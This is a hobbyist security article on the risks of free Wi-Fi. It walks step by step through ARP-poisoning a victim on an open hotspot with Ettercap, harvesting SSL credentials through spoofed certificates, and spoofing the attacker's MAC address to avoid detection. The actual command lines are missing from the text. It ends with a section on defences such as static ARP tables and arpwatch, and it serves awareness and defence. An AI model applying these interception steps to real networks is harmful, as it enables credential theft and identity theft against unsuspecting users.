The (Obvious?) Dangers of Free Wi-Fi
by Azazel
Free public Wi-Fi hotspots are pretty commonly available these days.
Libraries, Barnes & Noble, and Starbucks are just a few places where one can go and connect to the Internet for free.
Of course, by now everyone knows the dangers of connecting to these hotspots, right? Well, obviously not or I wouldn't be writing this.
Here, I'm going to walk you through one of the greatest dangers of connecting to a free, unencrypted wireless access point: the notorious "man-in-the-middle" attacks.
Keep in mind, this attack can be perpetrated on any wireless access point the attacker has access to, whether he legitimately has access or has cracked a key to gain access. The fact that these public access points are open just makes it that much easier. If you try anything demonstrated here, make sure to only do so on a network in which you have permission from the administrator.
First, let's change our MAC address. After all, we're joining a public network, we want some privacy for crying out loud! Open a root shell and type:
Where eth0 can be replaced with whatever your wireless interface is and the X are replaced by whatever 48-bit hexadecimal number you choose for your new MAC address.
Now let's join the network.
If it's an open network, as free hotspots are, this is easy enough. Once you've joined, type ifconfig in the console to see what IP address you've been assigned.
In order to find a target, we'll have to find another host on the network. You can use any scanner for this, but I prefer Nmap. For the purposes of this article, we can just do a simple ping sweep by using the command:
Make sure to use the appropriate private IP range and subnet for the network you're connected to.
You'll get a list of hosts who are up and on the network. Run a quick check for the default gateway by typing:
and making a note of the gateway IP address.
The next step is ARP poisoning the victim and becoming the "man-in-the-middle."
For this, we'll use Ettercap.
Ettercap is a very versatile suite with many useful tools. In fact, had we chosen to, we could've used this for the host scan. It can be used for packet sniffing/logging, data injection, and many other things which we will touch upon later.
But we still need to do a little configuring before we can continue. We will first need to enable IP forwarding, so open a console and type:
Next, open the etter.conf file and under "Linux" remove the comment hashes in the two statements following the if you use iptables line. Ettercap is now ready to go.
In a console enter the following:
Here, -i indicates your interface.
The -T switch designates a text only interface.
By pressing "h" while in this mode, you will get more options, including the option to activate plug-ins.
-M starts your man-in-the-middle attack, where arp:remote is your method:argument.
By specifying arp, we are using the ARP poisoning method. ARP poisoning, also known as ARP spoofing, essentially fools the network nodes into associating the attacker's MAC address with that of another client.
As such, traffic meant for the victim will go to the attacker, who can then choose to forward that traffic along to the intended recipient (as we will in this case). Alternatively, the attacker could associate a non-existent MAC address with the default gateway which would result in a DoS. And that's it!
As an attacker, you now stand between the victim and the gateway and have the ability to intercept and manipulate all the traffic between them.
Let's go a step further in demonstrating how dangerous free hotspots are.
Let's start Ettercap with this command instead:
Launch Firefox and watch as your browser seemingly navigates itself.
Actually, you're following along with what the victim is browsing. As the victim navigates to Gmail or eBay or other SSL sites, keep an eye on the console where you first opened Ettercap.
The victim's credentials will appear as they are supplied. Ettercap passes spoofed certificates to the victim. So all the victim will notice is a certificate as they attempt to sign in.
This attack is based on the assumption that people will just accept these blindly. The victim may think that they are receiving this just because they are on a different network or, more likely, they may not care. Either way, there's a good chance it will be accepted and they will then enter their credentials.
If you're having a problem getting the remote_browser plug-in to work, open up etter.conf again.
Under [privs] change the values of ec_uid and ec_gid to 0 (zero).
Then scroll down to the line that reads:
and change mozilla to firefox.
The attacker has seen the browsing habits of the victim and obtained information to access secure sites at a later time. What this really means is the attacker may now know the victim's interests or place of employment and may have access to the victim's personal information.
From here, we hardly have to use our imagination to consider what could happen to the victim. The attacker has enough information off of which to base some clever social engineering attacks and this innocent, though ignorant, Wi-Fi user who just came to have some coffee and check e-mail has become a potential victim for identity theft.
As I said before, Ettercap is a versatile tool.
An attacker can ARP poison more than one victim at a time, although if you're following along with them in a browser it can get messy. There are many other things that can be done while acting as man-in-the-middle.
I will mention some, and Ettercap can be used for most of them, but I will not go into detail. An attacker can redirect traffic.
For instance, if you hate Best Buy, you can redirect all requests for bestbuy.com to anti-Best Buy sites.
An attacker can also manipulate data, replacing pictures or snippets of text. Play around with different switches and plug-ins, read the man pages, experiment with it, and have phun!
Most importantly, remember how insecure free Wi-Fi hotspots are.
Playing "D"
How can we protect ourselves against man-in-the-middle attacks?
Obviously, don't use public Wi-Fi spots.
But if you have to, do not do anything you wouldn't like anyone else to see, especially typing in usernames or passwords.
As an administrator of a small network, you can implement static IP addressing as opposed to DHCP. Also consider implementing static ARP tables. Enabling MAC address filtering on your router may also help prevent unauthorized clients from joining your network.
All of these methods will work on larger networks as well, but will become quite cumbersome for the administrator.
A program like arpwatch, or WinARPwatch for Windows, will monitor your ARP cache and let you know if a known association of IP addresses and MAC addresses has changed.
Also, don't broadcast your SSID. Make sure to use a complex WPA2 passphrase using a combination of uppercase and lowercase letters, numbers, and non-alphanumeric characters. Don't use words that will be found in a dictionary.
One last thing: the reason we initially spoofed our MAC address was because a vigilant user or admin could easily find the MAC address of an attacker by checking their ARP cache, using the command:
or arp -a in Windows.